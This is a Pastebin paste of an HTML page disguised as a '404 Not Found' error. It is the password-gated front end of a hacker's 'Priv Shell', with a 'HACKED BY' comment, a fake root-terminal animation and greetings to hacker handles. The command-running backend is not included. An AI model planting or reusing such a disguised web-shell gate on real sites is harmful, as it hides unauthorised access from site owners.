Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <html>
- <title>404 Not Found : ./R3DGH0ST7</title>
- <link rel="shortcut icon" type="image/x-icon" href="http://www.fancyicons.com/free-icons/116/hooligans/png/48/ball_48.png">
- <style>
- body{
- text-align: center;
- font-size: 12px;
- font-family: verdana;
- background: url(http://img12.deviantart.net/299d/i/2016/211/2/8/emilia___re_zero_minimalist_anime_by_lucifer012-dac0rld.png) no-repeat center center fixed; #fff;
- -webkit-background-size: cover;
- -moz-background-size: cover;
- -o-background-size: cover;
- background-size: cover;
- background-attachment:fixed;
- }
- h1 {
- padding: 10px 15px;
- margin: 0px;
- font-size: 14px;
- background-color: silver;
- //background-image: -moz-linear-gradient(100% 100% 90deg, #777, #999) !important;
- //background-image: -webkit-gradient(linear, 0% 0%, 0% 100%, from(#999), to(#777)) !important;
- color: #FFF;
- //-webkit-border-radius:8px 8px 0px 0px;
- //-moz-border-radius: 8px 8px 0px 0px;
- border-radius: 8px 8px 0px 0px;
- text-shadow:1px 1px 2px #333333;
- opacity: 0.5;
- }
- table {
- width: 565px;
- }
- table tr td{
- font-family: verdana;
- font-size: 11px;
- padding: 10px 5px;
- border-bottom: solid 1px #CCC;
- }
- #wrapper{
- width: 800px;
- margin: 10px auto;
- text-align: left;
- background: url('../../1.bp.blogspot.com/-xdXyTCPgotU/UO8FbtXIm0I/AAAAAAAABVM/2r5gUEZZA3g/s1600/dra2.png') no-repeat center center fixed;
- }
- #console{
- height: 450px;
- overflow: auto;
- background-color: #000;
- padding: 15px;
- font-family: monospace;
- font-size: 12px;
- color: #FFF;
- }
- .content{
- padding: 15px;
- }
- #root{
- display: none;
- }
- #formnya{
- display: none;
- }
- #commander{
- border: solid 1px #CCC;
- padding: 5px 10px;
- -webkit-border-radius: 2px;
- -moz-border-radius: 2px;
- border-radius: 2px;
- margin: 5px;
- width: 590px;
- height: 30px;
- display: none;
- }
- .box{
- -moz-box-shadow: 1px 1px 8px #666;
- -webkit-box-shadow: 1px 1px 8px #666;
- box-shadow: 1px 1px 8px #40D5D2;
- border: solid 1px black;
- -webkit-border-radius: 8px 8px 0px 0px;
- -moz-border-radius: 8px 8px 0px 0px;
- border-radius: 8px 8px 0px 0px;
- margin: 15px 0px;
- background-color: #F5F5F5;
- opacity: 0.8;
- }
- #help{
- width: 300px;
- float: right;
- }
- .prefix{
- color: #0077E7;
- }
- .keyword{
- color: #9eff63;
- }
- .error{
- color: #FF0000;
- }
- .spacer{
- clear: both;
- display: block;
- }
- form {
- display: inline-block; //Or display: inline;
- }
- input[type=password] {
- width: 250px;
- height: 25px;
- color: white;
- background: transparent;
- border: 1px dotted transparent;
- padding: 5px;
- margin-left: 20px;
- }
- </style>
- <script>
- function showmz(){
- document.getElementById("root").style.display='block';
- }
- </script>
- <script type="text/javascript">
- // -----===== HACKED BY : <font color="red">./RedGh0st7</font>=====-----
- TypingText = function(element, interval, cursor, finishedCallback) {
- if((typeof document.getElementById == "undefined") || (typeof
- element.innerHTML == "undefined")) {
- this.running = true;
- return;
- }
- this.element = element;
- this.finishedCallback = (finishedCallback ? finishedCallback : function() {
- return; });
- this.interval = (typeof interval == "undefined" ? 100 : interval);
- this.origText = this.element.innerHTML;
- this.unparsedOrigText = this.origText;
- this.cursor = (cursor ? cursor : "");
- this.currentText = "";
- this.currentChar = 0;
- this.element.typingText = this;
- if(this.element.id == "") this.element.id = "typingtext" +
- TypingText.currentIndex++;
- TypingText.all.push(this);
- this.running = false;
- this.inTag = false;
- this.tagBuffer = "";
- this.inHTMLEntity = false;
- this.HTMLEntityBuffer = "";
- }
- TypingText.all = new Array();
- TypingText.currentIndex = 0;
- TypingText.runAll = function() {
- for(var i = 0; i < TypingText.all.length; i++) TypingText.all[i].run();
- }
- TypingText.prototype.run = function() {
- if(this.running) return;
- if(typeof this.origText == "undefined") {
- setTimeout("document.getElementById('" + this.element.id +
- "').typingText.run()", this.interval);
- return;
- }
- if(this.currentText == "") this.element.innerHTML = "";
- if(this.currentChar < this.origText.length) {
- if(this.origText.charAt(this.currentChar) == "<" && !this.inTag) {
- this.tagBuffer = "<";
- this.inTag = true;
- this.currentChar++;
- this.run();
- return;
- } else if(this.origText.charAt(this.currentChar) == ">" && this.inTag) {
- this.tagBuffer += ">";
- this.inTag = false;
- this.currentText += this.tagBuffer;
- this.currentChar++;
- this.run();
- return;
- } else if(this.inTag) {
- this.tagBuffer += this.origText.charAt(this.currentChar);
- this.currentChar++;
- this.run();
- return;
- } else if(this.origText.charAt(this.currentChar) == "&" && !
- this.inHTMLEntity) {
- this.HTMLEntityBuffer = "&";
- this.inHTMLEntity = true;
- this.currentChar++;
- this.run();
- return;
- } else if(this.origText.charAt(this.currentChar) == ";" &&
- this.inHTMLEntity) {
- this.HTMLEntityBuffer += ";";
- this.inHTMLEntity = false;
- this.currentText += this.HTMLEntityBuffer;
- this.currentChar++;
- this.run();
- return;
- } else if(this.inHTMLEntity) {
- this.HTMLEntityBuffer += this.origText.charAt(this.currentChar);
- this.currentChar++;
- this.run();
- return;
- } else {
- this.currentText += this.origText.charAt(this.currentChar);
- }
- this.element.innerHTML = this.currentText;
- this.element.innerHTML += (this.currentChar < this.origText.length - 1 ?
- (typeof this.cursor == "function" ? this.cursor(this.currentText) : this.cursor) :
- "");
- this.currentChar++;
- setTimeout("document.getElementById('" + this.element.id +
- "').typingText.run()", this.interval);
- } else {
- this.currentText = "";
- this.currentChar = 0;
- this.running = false;
- this.finishedCallback();
- document.getElementById("formnya").style.display='block';
- }
- }
- </script>
- </head>
- <body>
- <div id="wrapper">
- <div class="box">
- <h1>./R3DGH0ST7 Priv Shell </h1>
- <div id="console"><span class="prefix">
- <p id="message">
- <font color=" ff00c1f4 ">[+] Message :</font><font color="# dc00ffff "> Welcome To my Shell</font><br>
- <font color=" ff00c1f4 ">[+] Message :</font><font color="# dc00ffff "> ./R3DGH0ST7 priv Shell</font><br>
- <font color=" ff00c1f4 ">[+] Message :</font><font color="# dc00ffff "> kutjeng is cat</font><br>
- <font color=" ff00c1f4 ">[+] Message :</font></font>
- <font color=" ff00c1f4 ">THANK'S :<font color="lime"> | S.777 | nov_404 | 4L3X15 | Mr. BeeZ | Mr.P24_404 | Mr.R,17_N0t_404| K1dz</font><br><br>
- <font color=" ff00c1f4 ">[sudo]./R3DGH0ST7 :~$</font><font color="# dc00ffff "> sudo su</font>
- <form method="post" action="" name="formnya" id="formnya"><font color=" ff00c1f4 ">[sudo]**password for</font><font color="# dc00ffff ">./R3DGH0ST7 :<input type="password" name="pass" id="pass"><input type="submit" onclick="showmz()" style="display: none"></font></form></p><p id="root">
- <font color=" ff00c1f4 ">root@./R3DGH0ST7 :</font><font color="# dc00ffff "> [+] Security Passed [+]</font><br>
- <font color=" ff00c1f4 ">root@./R3DGH0ST7 :~#</font><font color="# dc00ffff "> chmod +x localhost.sh</font><br>
- <font color=" ff00c1f4 ">root@./R3DGH0ST7 :~#</font><font color="# dc00ffff "> ./localhost.sh </font><br>
- <font color=" ff00c1f4 ">[+] Message :</font><font color="# dc00ffff "> Please Wait...</font><br>
- </p>
- <input text="test" id="commander" onkeyup="execute(this,event);" disabled="disabled" style="width:786px;"/>
- <script type="text/javascript">
- new TypingText(document.getElementById("message"), 25, function(i){ var ar
- = new Array("|", "|", "|", "|"); return " " + ar[i.length % ar.length]; });
- //Type out examples:
- TypingText.runAll();
- </script><script>
- function rootmz(){
- new TypingText(document.getElementById("root"), 25, function(i){ var ar
- = new Array("|", "|", "|", "|"); return " " + ar[i.length % ar.length]; });
- //Type out examples:
- TypingText.runAll();
- }
- </script></div>
- <div class="alert alert-info" style="font-size:15px; padding:5px; text-align:center"><br/><u style="cursor:pointer;color:blue;text-decoration:blink" onclick="goPmb()"> <b><font color="black">./R3DGH0ST7 Priv Shell By ./R3DGH0ST7<br></u></div></html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement